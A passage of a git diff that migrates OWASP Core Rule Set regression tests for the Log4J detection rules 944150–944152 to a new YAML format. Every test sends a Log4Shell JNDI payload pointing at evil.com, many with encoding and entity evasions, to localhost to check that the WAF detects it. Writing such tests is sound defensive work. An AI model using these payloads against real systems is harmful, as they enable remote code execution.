- data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-22 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml index 71a8e0235..f056faeac 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml @@ -1,456 +1,454 @@ --- -# NOTE: Please keep these tests in sync with 944151.yaml. -# 944151 should detect the same things as 944151. +# NOTE: Please keep these tests in sync with 944150.yaml and 944152.yaml. +# 944151 should detect the same things as 944150 and 944152. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944151.yaml" - description: "Description" +rule_id: 944151 tests: - - test_title: 944151-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-3 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-17 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-22 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-25 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 25 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944151" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml index e88f83f63..f1509f20d 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml @@ -1,474 +1,472 @@ --- -# NOTE: Please keep these tests in sync with 944152.yaml and 944151.yaml. -# 944152 should detect the same things as 944152 and 944151. +# NOTE: Please keep these tests in sync with 944150.yaml and 944151.yaml. +# 944152 should detect the same things as 944150 and 944151. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944152.yaml" - description: "Description" +rule_id: 944152 tests: - - test_title: 944152-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-3 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - 